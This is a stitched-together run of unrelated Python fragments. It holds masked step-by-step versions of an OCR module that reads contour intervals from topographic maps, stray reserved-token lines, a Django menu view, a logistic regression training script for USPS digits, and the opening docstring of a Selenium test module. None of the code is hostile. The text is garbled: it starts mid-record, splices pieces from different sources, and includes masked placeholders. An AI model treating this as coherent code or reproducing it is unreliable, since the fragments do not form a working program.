value):\n self._contour_interval_dist = value\n\n @property\n def feet_per_pixel(self):\n if self._feet_per_pixel is None:\n self._feet_per_pixel = self.__get_feet_per_pixel()\n return self._feet_per_pixel\n\n @feet_per_pixel.setter\n def feet_per_pixel(self, value):\n self._feet_per_pixel = value\n\n\nclass TopographicMap:\n\n def __init__(self, filename):\n self.filename = filename\n self.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n self.image_data = ImageData(self.image)\n self.height, self.width, self.channels = self.image.shape\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ImageData:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, image):\n self.image = image\n self._contour_interval_dist = None\n self._feet_per_pixel = None\n\n def __get_sub_image(self):\n rows, cols, chan = self.image.shape\n sub_image = self.image[int(self.__bottom_thresh * rows):rows, int(\n self.__left_thresh * cols):int(self.__right_thresh * cols)]\n sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy\n =self.__resize_factor, interpolation=cv2.INTER_LINEAR)\n sub_image = Helper.convert_image_to_mask(sub_image)\n gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, \n 7, 21)\n threshold_image = cv2.threshold(gray_denoised_image, 225, 255, cv2.\n THRESH_BINARY_INV)[1]\n return sub_image\n\n def __get_countour_interval_dist(self):\n candidates = []\n for word, offset in self.__words_offsets:\n candidates += self.__find_candidates_for_id_and_index(self.\n word_list, word, offset)\n return candidates[0][1] if len(candidates) > 0 else 40\n <mask token>\n\n def __find_candidates_for_id_and_index(self, word_list, id_word, offset):\n candidates = []\n indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]\n for i in indices:\n if word_list[i + offset].isnumeric():\n cand = i, int(word_list[i + offset])\n candidates.append(cand)\n return candidates\n\n def __get_words(self):\n filename = '{}.png'.format(os.getpid())\n cv2.imwrite(filename, self.sub_image)\n words = pytesseract.image_to_string(Image.open(filename))\n boxes = pytesseract.image_to_string(Image.open(filename), boxes=\n True, config='hocr')\n os.remove(filename)\n word_list = words.split()\n box_list = boxes.split()\n return word_list, box_list\n\n @property\n def contour_interval_dist(self):\n return 40\n\n @contour_interval_dist.setter\n def contour_interval_dist(self, value):\n self._contour_interval_dist = value\n\n @property\n def feet_per_pixel(self):\n if self._feet_per_pixel is None:\n self._feet_per_pixel = self.__get_feet_per_pixel()\n return self._feet_per_pixel\n\n @feet_per_pixel.setter\n def feet_per_pixel(self, value):\n self._feet_per_pixel = value\n\n\nclass TopographicMap:\n\n def __init__(self, filename):\n self.filename = filename\n self.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n self.image_data = ImageData(self.image)\n self.height, self.width, self.channels = self.image.shape\n\n\n<mask token>\n",
"step-5": "import cv2\nimport pytesseract\nimport os\nfrom PIL import Image\nimport numpy as np\n\nfrom helper_functions import Helper\n\nclass ImageData:\n\t# multipliers to get portion of image with interval value\n\t__bottom_thresh = 0.9\n\t__left_thresh = 0.35\n\t__right_thresh = 0.65\n\n\t# (words, offset) to contour interval value\n\t__words_offsets = [(\"CONTOUR\", 2), (\"INTERVAL\", 1), (\"FEET\", -1)]\n\t__resize_factor = 6\n\n\tdef __init__(self, image):\n\t\tself.image = image\n\n\t\t# self.sub_image = self.__get_sub_image()\n\t\t\n\t\t# word_list, box_list = self.__get_words()\n\t\t# self.word_list = word_list\n\t\t# self.box_list = box_list\n\n\t\tself._contour_interval_dist = None\n\t\tself._feet_per_pixel = None\n\n\tdef __get_sub_image(self):\n\t\trows, cols, chan = self.image.shape\n\n\t\tsub_image = self.image[\n\t\t\tint(self.__bottom_thresh*rows):rows, \t\t\t\t\t\t# bottom rows\n\t\t\tint(self.__left_thresh*cols):int(self.__right_thresh*cols)\t# middle rows\n\t\t\t]\n\n\t\tsub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy=self.__resize_factor, \n\t\t\tinterpolation = cv2.INTER_LINEAR)\n\n\t\tsub_image = Helper.convert_image_to_mask(sub_image)\n\t\tgray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, 7, 21)\n\t\tthreshold_image = cv2.threshold(gray_denoised_image,225,255,cv2.THRESH_BINARY_INV)[1]\n\n\t\treturn sub_image\n\n\tdef __get_countour_interval_dist(self):\n\t\tcandidates = []\n\n\t\tfor word, offset in self.__words_offsets:\n\t\t\tcandidates += self.__find_candidates_for_id_and_index(self.word_list, word, offset)\n\n\t\treturn candidates[0][1] if len(candidates) > 0 else 40 \n\n\tdef __get_feet_per_pixel(self):\n\t\t# row_size = 6\n\t\t# total = int(len(self.box_list) / 6)\n\t\t# idx = 0\n\n\t\t# nums = [(idx, int(char)) for idx, char in enumerate(self.box_list) \n\t\t# if idx % row_size == 0 and char.isdigit() and int(char) > 2 and int(char) < 10]\n\n\t\t# nums.sort(key=lambda val: self.box_list[val[0] + 2])\n\n\t\t# threshold = 3\n\t\t# prev_x = -1\n\t\t# prev_y = -2 * threshold\n\t\t# prev_num = -1\n\n\t\t# img = self.sub_image.copy()\n\n\t\t# lsd = cv2.createLineSegmentDetector(0)\n\t\t# lines = lsd.detect(img)[0] \n\t\t# drawn_img = lsd.drawSegments(img,lines)\n\t\t# cv2.imshow(\"LSD\",drawn_img )\n\t\t\n\t\t# # h, w, _ = img.shape\n\n\t\t# # for (idx, num) in nums:\n\t\t# # \tcur_x = int(self.box_list[idx + 1])\n\t\t# # \tcur_y = int(self.box_list[idx + 2])\n\t\t# # \tcur_x2 = int(self.box_list[idx + 3])\n\t\t# # \tcur_y2 = int(self.box_list[idx + 4])\n\n\t\t# # \tprint(str(num) + \": \" + str(cur_x) + \", \" + str(cur_y) + \" :: \" + str(cur_x2) + \", \" + str(cur_y2))\n\t\t# # \timg = cv2.rectangle(img,(cur_x,h-cur_y),(cur_x2,h-cur_y2),(255,0,0),2)\n\t\t# # \t# if abs(cur_y - prev_y) < threshold:\n\t\t# # \t# \tdist = abs(cur_x - cur_y)\n\t\t# # \t# \tdiff = abs(num - prev_num)\n\t\t# # \t# \tprint(\"possibility found ^\\n--------\")\n\n\t\t# # \t# prev_x = cur_x\n\t\t# # \t# prev_y = cur_y\n\t\t# # \t# prev_num = num\n\t\t# img = cv2.resize(img, None, fx=1/6, fy=1/6, \n\t\t# \tinterpolation = cv2.INTER_LINEAR)\n\t\t# cv2.imshow(\"blah\", img)\n\t\t# print(nums)\n\n\t\treturn 5280 / 790# hardcoded estimatem, ft per mile / pixel per mile = feet per pixel\n\n\tdef __find_candidates_for_id_and_index(self, word_list, id_word, offset):\n\t\tcandidates = []\n\n\t\tindices = [i for i, x in enumerate(word_list) if x.upper() == id_word]\n\n\t\tfor i in indices:\n\t\t\tif word_list[i+offset].isnumeric():\n\t\t\t\tcand = (i, 
int(word_list[i+offset]))\n\t\t\t\tcandidates.append(cand)\n\n\t\treturn candidates\n\n\tdef __get_words(self):\n\t\tfilename = \"{}.png\".format(os.getpid())\n\t\tcv2.imwrite(filename, self.sub_image)\n\n\t\twords = pytesseract.image_to_string(Image.open(filename))\n\n\t\tboxes = pytesseract.image_to_string(Image.open(filename), boxes=True, config=\"hocr\")\n\n\t\tos.remove(filename)\n\t\tword_list = words.split()\n\t\tbox_list = boxes.split()\n\n\t\treturn word_list, box_list\n\n\t@property\n\tdef contour_interval_dist(self):\n\t\t# if self._contour_interval_dist is None:\n\t\t# \tself._contour_interval_dist = self.__get_countour_interval_dist()\n\n\t\t# return self._contour_interval_dist\n\t\t# return 40\n\t\treturn 40\n\n\t@contour_interval_dist.setter\n\tdef contour_interval_dist(self, value):\n\t\tself._contour_interval_dist = value\n\n\t@property\n\tdef feet_per_pixel(self):\n\t\tif self._feet_per_pixel is None:\n\t\t\tself._feet_per_pixel = self.__get_feet_per_pixel()\n\n\t\treturn self._feet_per_pixel\n\n\t@feet_per_pixel.setter\n\tdef feet_per_pixel(self, value):\n\t\tself._feet_per_pixel = value\n\nclass TopographicMap:\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\t\tself.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n\t\t# self.image = cv2.imread(filename, 1)#[500:-550, 500:-500]\n\t\tself.image_data = ImageData(self.image)\n\n\t\tself.height, self.width, self.channels = self.image.shape\n\t\t\n\nif __name__ == '__main__':\n\t# img = Topographic_Map(\"SanLuisObispo.jpg\")\n\timport numpy as np\n\timport time\n\timage = cv2.imread('maps/SanLuisObispo.jpg', 1)[500:1000, 500:1300]\n\tr, c, chan = image.shape\n\ttl = image[:int(r/2), :int(c/2)]\n\ttr = image[:int(r/2), int(c/2):]\n\tbl = image[int(r/2):, :int(c/2)]\n\tbr = image[int(r/2):, int(c/2):]\n\t\n\ts = time.time()\n\timg = cv2.fastNlMeansDenoising(image, None, 5, 7, 21)\n\te = time.time()\n\n\tprint(\"total image: \" + str(e-s))\n\n\ts = time.time()\n\ttl = cv2.fastNlMeansDenoising(tl, None, 5, 7, 21)\n\ttr = cv2.fastNlMeansDenoising(tr, None, 5, 7, 21)\n\tbl = cv2.fastNlMeansDenoising(bl, None, 5, 7, 21)\n\tbr = cv2.fastNlMeansDenoising(br, None, 5, 7, 21)\n\te = time.time()\n\n\ttop = np.concatenate((tl, tr), axis=1)\n\tbottom = np.concatenate((bl, br), axis=1)\n\tnew_image = np.concatenate((top, bottom), axis=0)\n\n\tprint(\"partitioned image: \" + str(e-s))\n\n\tcv2.imshow('img', img)\n\tcv2.imshow('new_image', new_image)\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()\n",
"step-ids": [
6,
10,
11,
12,
17
]
}
|
[
6,
10,
11,
12,
17
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def index(request):
return render(request, 'munchiesfastfood/home.html', {'drinks': [
'Pineapple Juice', 'Green Juice', 'Soft Drinks',
'Carlo Rosee Drinks'], 'dishes': ['Beef Steak',
'Tomato with Chicken', 'Sausages from Italy', 'Beef Grilled']})
<|reserved_special_token_1|>
from django.shortcuts import render
def index(request):
return render(request, 'munchiesfastfood/home.html', {'drinks': [
'Pineapple Juice', 'Green Juice', 'Soft Drinks',
'Carlo Rosee Drinks'], 'dishes': ['Beef Steak',
'Tomato with Chicken', 'Sausages from Italy', 'Beef Grilled']})
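# A minimal URLconf sketch for wiring this view up (hypothetical, Django 2+; not part of this file):
#   from django.urls import path
#   from . import views
#   urlpatterns = [path('', views.index, name='index')]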
|
flexible
|
{
"blob_id": "e279ca43ce2c582c702f1c6a0c1acf37eb9bcefe",
"index": 5603,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef index(request):\n return render(request, 'munchiesfastfood/home.html', {'drinks': [\n 'Pineapple Juice', 'Green Juice', 'Soft Drinks',\n 'Carlo Rosee Drinks'], 'dishes': ['Beef Steak',\n 'Tomato with Chicken', 'Sausages from Italy', 'Beef Grilled']})\n",
"step-3": "from django.shortcuts import render\n\n\ndef index(request):\n return render(request, 'munchiesfastfood/home.html', {'drinks': [\n 'Pineapple Juice', 'Green Juice', 'Soft Drinks',\n 'Carlo Rosee Drinks'], 'dishes': ['Beef Steak',\n 'Tomato with Chicken', 'Sausages from Italy', 'Beef Grilled']})\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import sys
import numpy as np
import math
import matplotlib.pyplot as plt
import random
def load_files(training, testing):
tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=",")
tr_feat /= 255.0
tr_feat = np.insert(tr_feat, 0, 0, axis=1)
tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=",")
tr_exp = tr_exp[:, -1]
te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=",")
te_feat /= 255.0
te_feat = np.insert(te_feat, 0, 0, axis=1)
te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=",")
te_exp = te_exp[:, -1]
# for i in tr_feat:
# if i > 1 or i < 0:
# raise ValueError("WHY")
# for i in te_feat:
# if i > 1 or i < 0:
# raise ValueError("WHY")
return tr_feat, tr_exp, te_feat, te_exp
def sigmoid(weight, case):
# try:
exponent = -np.dot(weight.T, case)
try:
prediction = 1.0 / (1.0 + math.exp(exponent))
except Exception as e:
return 1.0 / (1.0 + math.exp(500))
# If you've gotten this far you've noticed that the last two accuracies are always 50%
# I couldn't tell you why, seeing as our weights look correct
# And
return prediction
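# A numerically steadier variant (sketch, not the author's code): clip the logit so that
# neither branch of the exception handler is needed, e.g.
#   z = float(np.clip(np.dot(weight.T, case), -30.0, 30.0))
#   return 1.0 / (1.0 + math.exp(-z))
# scipy.special.expit(np.dot(weight.T, case)) is an equivalent, overflow-safe library call.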
def check_accuracy(w, x, y):
correct = 0
for i in range(x.shape[0]):
if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:
correct += 1
elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:
correct += 1
percentage_correct = correct / x.shape[0]
return percentage_correct
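# check_accuracy thresholds on the sign of np.dot(w.T, x): sigmoid(w.x) >= 0.5 exactly when
# w.x >= 0, so the 0.0 cut-off above is the usual 0.5 probability threshold.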
def gradient(training_data, training_expected, testing_data, testing_expected, reg_strength=None, iterations=100, learning_rate=0.00005):
training_accuracies = []
testing_accuracies = []
if reg_strength is not None:
try:
reg_strength = float(reg_strength)
except:
reg_strength = None
w = np.zeros(training_data.shape[1]) # Feature count
for _ in range(iterations):
gradient_batch = np.zeros(training_data.shape[1]) # Feature count
for i in range(training_data.shape[0]): # Example count
predicted = sigmoid(w, training_data[i])
diff = (np.subtract(
predicted, training_expected[i]))
diff = np.multiply(diff, training_data[i])
gradient_batch = np.add(gradient_batch, diff)
if reg_strength is not None:
normalized = np.linalg.norm(w)
gradient_batch = np.add(
gradient_batch, np.multiply(normalized, reg_strength))
gradient_batch = np.multiply(learning_rate, gradient_batch)
w = np.subtract(w, gradient_batch)
training_accuracies.append(check_accuracy(
w, training_data, training_expected))
testing_accuracies.append(check_accuracy(
w, testing_data, testing_expected))
return training_accuracies, testing_accuracies
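# Note on the regularization above: it adds the scalar reg_strength * ||w|| to every gradient
# component. The conventional L2 penalty (reg_strength/2) * ||w||^2 would instead contribute
# an elementwise term, e.g.
#   gradient_batch = np.add(gradient_batch, np.multiply(reg_strength, w))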
args = sys.argv[1:]
if len(args) < 3:
print("You must include a training and testing dataset, as well as a learning rate", file=sys.stderr)
print("Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate")
exit(1)
iterations = []
for i in range(0, 100):
iterations.append(i+1)
training_features, training_expected, test_features, test_expected = load_files(
args[0], args[1])
training_accuracies, testing_accuracies = gradient(
training_features, training_expected, test_features, test_expected, learning_rate=float(args[2]))
plt.ylabel("Accuracy")
plt.xlabel("Iteration")
plt.title(f"Accuracy as Function of Iteration Learing Rate = {args[2]}")
plt.plot(iterations, training_accuracies, 'b', label='training')
plt.plot(iterations, testing_accuracies, 'r', label='testing')
plt.legend()
plt.savefig("graph_results.png")  # save before show(); the figure can be empty after show() returns
plt.show()
|
normal
|
{
"blob_id": "4af05a13264c249be69071447101d684ff97063e",
"index": 6725,
"step-1": "<mask token>\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=',')\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=',')\n tr_exp = tr_exp[:, -1]\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=',')\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=',')\n te_exp = te_exp[:, -1]\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n exponent = -np.dot(weight.T, case)\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data,\n testing_expected, reg_strength=None, iterations=100, learning_rate=5e-05):\n training_accuracies = []\n testing_accuracies = []\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n w = np.zeros(training_data.shape[1])\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1])\n for i in range(training_data.shape[0]):\n predicted = sigmoid(w, training_data[i])\n diff = np.subtract(predicted, training_expected[i])\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(gradient_batch, np.multiply(normalized,\n reg_strength))\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n training_accuracies.append(check_accuracy(w, training_data,\n training_expected))\n testing_accuracies.append(check_accuracy(w, testing_data,\n testing_expected))\n return training_accuracies, testing_accuracies\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=',')\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=',')\n tr_exp = tr_exp[:, -1]\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=',')\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=',')\n te_exp = te_exp[:, -1]\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n exponent = -np.dot(weight.T, case)\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data,\n testing_expected, reg_strength=None, iterations=100, learning_rate=5e-05):\n training_accuracies = []\n testing_accuracies = []\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n w = np.zeros(training_data.shape[1])\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1])\n for i in range(training_data.shape[0]):\n predicted = sigmoid(w, training_data[i])\n diff = np.subtract(predicted, training_expected[i])\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(gradient_batch, np.multiply(normalized,\n reg_strength))\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n training_accuracies.append(check_accuracy(w, training_data,\n training_expected))\n testing_accuracies.append(check_accuracy(w, testing_data,\n testing_expected))\n return training_accuracies, testing_accuracies\n\n\n<mask token>\nif len(args) < 2:\n print(\n 'You must include a training and testing dataset, as well as a learning rate'\n , file=sys.stderr)\n print('Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate'\n )\n exit(1)\n<mask token>\nfor i in range(0, 100):\n iterations.append(i + 1)\n<mask token>\nplt.ylabel('Accuracy')\nplt.xlabel('Iteration')\nplt.title(f'Accuracy as Function of Iteration Learing Rate = {args[2]}')\nplt.plot(iterations, training_accuracies, 'b', label='training')\nplt.plot(iterations, testing_accuracies, 'r', label='testing')\nplt.legend()\nplt.show()\nplt.savefig(f'graph_results.png')\n",
"step-3": "<mask token>\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=',')\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=',')\n tr_exp = tr_exp[:, -1]\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=',')\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=',')\n te_exp = te_exp[:, -1]\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n exponent = -np.dot(weight.T, case)\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data,\n testing_expected, reg_strength=None, iterations=100, learning_rate=5e-05):\n training_accuracies = []\n testing_accuracies = []\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n w = np.zeros(training_data.shape[1])\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1])\n for i in range(training_data.shape[0]):\n predicted = sigmoid(w, training_data[i])\n diff = np.subtract(predicted, training_expected[i])\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(gradient_batch, np.multiply(normalized,\n reg_strength))\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n training_accuracies.append(check_accuracy(w, training_data,\n training_expected))\n testing_accuracies.append(check_accuracy(w, testing_data,\n testing_expected))\n return training_accuracies, testing_accuracies\n\n\nargs = sys.argv[1:]\nif len(args) < 2:\n print(\n 'You must include a training and testing dataset, as well as a learning rate'\n , file=sys.stderr)\n print('Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate'\n )\n exit(1)\niterations = []\nfor i in range(0, 100):\n iterations.append(i + 1)\ntraining_features, training_expected, test_features, test_expected = (\n load_files(args[0], args[1]))\ntraining_accuracies, testing_accuracies = gradient(training_features,\n training_expected, test_features, test_expected, learning_rate=float(\n args[2]))\nplt.ylabel('Accuracy')\nplt.xlabel('Iteration')\nplt.title(f'Accuracy as Function of Iteration Learing Rate = {args[2]}')\nplt.plot(iterations, training_accuracies, 'b', label='training')\nplt.plot(iterations, testing_accuracies, 'r', label='testing')\nplt.legend()\nplt.show()\nplt.savefig(f'graph_results.png')\n",
"step-4": "import sys\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport random\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=',')\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=',')\n tr_exp = tr_exp[:, -1]\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=',')\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=',')\n te_exp = te_exp[:, -1]\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n exponent = -np.dot(weight.T, case)\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data,\n testing_expected, reg_strength=None, iterations=100, learning_rate=5e-05):\n training_accuracies = []\n testing_accuracies = []\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n w = np.zeros(training_data.shape[1])\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1])\n for i in range(training_data.shape[0]):\n predicted = sigmoid(w, training_data[i])\n diff = np.subtract(predicted, training_expected[i])\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(gradient_batch, np.multiply(normalized,\n reg_strength))\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n training_accuracies.append(check_accuracy(w, training_data,\n training_expected))\n testing_accuracies.append(check_accuracy(w, testing_data,\n testing_expected))\n return training_accuracies, testing_accuracies\n\n\nargs = sys.argv[1:]\nif len(args) < 2:\n print(\n 'You must include a training and testing dataset, as well as a learning rate'\n , file=sys.stderr)\n print('Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate'\n )\n exit(1)\niterations = []\nfor i in range(0, 100):\n iterations.append(i + 1)\ntraining_features, training_expected, test_features, test_expected = (\n load_files(args[0], args[1]))\ntraining_accuracies, testing_accuracies = gradient(training_features,\n training_expected, test_features, test_expected, learning_rate=float(\n args[2]))\nplt.ylabel('Accuracy')\nplt.xlabel('Iteration')\nplt.title(f'Accuracy as Function of Iteration Learing Rate = {args[2]}')\nplt.plot(iterations, training_accuracies, 'b', label='training')\nplt.plot(iterations, testing_accuracies, 'r', label='testing')\nplt.legend()\nplt.show()\nplt.savefig(f'graph_results.png')\n",
"step-5": "import sys\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport random\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=\",\")\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=\",\")\n tr_exp = tr_exp[:, -1]\n\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=\",\")\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=\",\")\n te_exp = te_exp[:, -1]\n\n # for i in tr_feat:\n # if i > 1 or i < 0:\n # raise ValueError(\"WHY\")\n # for i in te_feat:\n # if i > 1 or i < 0:\n # raise ValueError(\"WHY\")\n\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n # try:\n exponent = -np.dot(weight.T, case)\n\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n # If you've gotten this far you've noticed that the last two accuracies are always 50%\n # I couldn't tell you why, seeing as our weights look correct\n # And\n\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data, testing_expected, reg_strength=None, iterations=100, learning_rate=0.00005):\n training_accuracies = []\n testing_accuracies = []\n\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n\n w = np.zeros(training_data.shape[1]) # Feature count\n\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1]) # Feature count\n for i in range(training_data.shape[0]): # Example count\n predicted = sigmoid(w, training_data[i])\n diff = (np.subtract(\n predicted, training_expected[i]))\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(\n gradient_batch, np.multiply(normalized, reg_strength))\n\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n\n training_accuracies.append(check_accuracy(\n w, training_data, training_expected))\n testing_accuracies.append(check_accuracy(\n w, testing_data, testing_expected))\n\n return training_accuracies, testing_accuracies\n\n\nargs = sys.argv[1:]\nif len(args) < 2:\n print(\"You must include a training and testing dataset, as well as a learning rate\", file=sys.stderr)\n print(\"Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate\")\n exit(1)\n\niterations = []\nfor i in range(0, 100):\n iterations.append(i+1)\n\ntraining_features, training_expected, test_features, test_expected = load_files(\n args[0], args[1])\ntraining_accuracies, testing_accuracies = gradient(\n training_features, training_expected, test_features, test_expected, learning_rate=float(args[2]))\nplt.ylabel(\"Accuracy\")\nplt.xlabel(\"Iteration\")\nplt.title(f\"Accuracy as Function of Iteration Learing Rate = {args[2]}\")\nplt.plot(iterations, training_accuracies, 'b', label='training')\nplt.plot(iterations, testing_accuracies, 'r', label='testing')\nplt.legend()\nplt.show()\nplt.savefig(f\"graph_results.png\")\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
"""
    Description: This module is used for testing. Testing is performed based on a list of commands to perform on a website.
Version : v1.5
History :
v1.0 - 08/01/2016 - Initial version
v1.1 - 08/05/2016 - Modified to accept List input.
v1.2 - 08/05/2016 - Removed dead code in feed_input
v1.3 - 08/05/2016 - Added function get_data_dictionary to return the fetched values
v1.4 - 09/01/2016 - updated _print_ function and added log_process_status variable
            v1.5 - 09/22/2016 - Added a variable to suppress writing output while running. Default - output will be written to file.
Open Issues: None.
Pending : Enhance coding standards. Clean up dead code in feed_input function
"""
__version__ = "1.0.0"
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
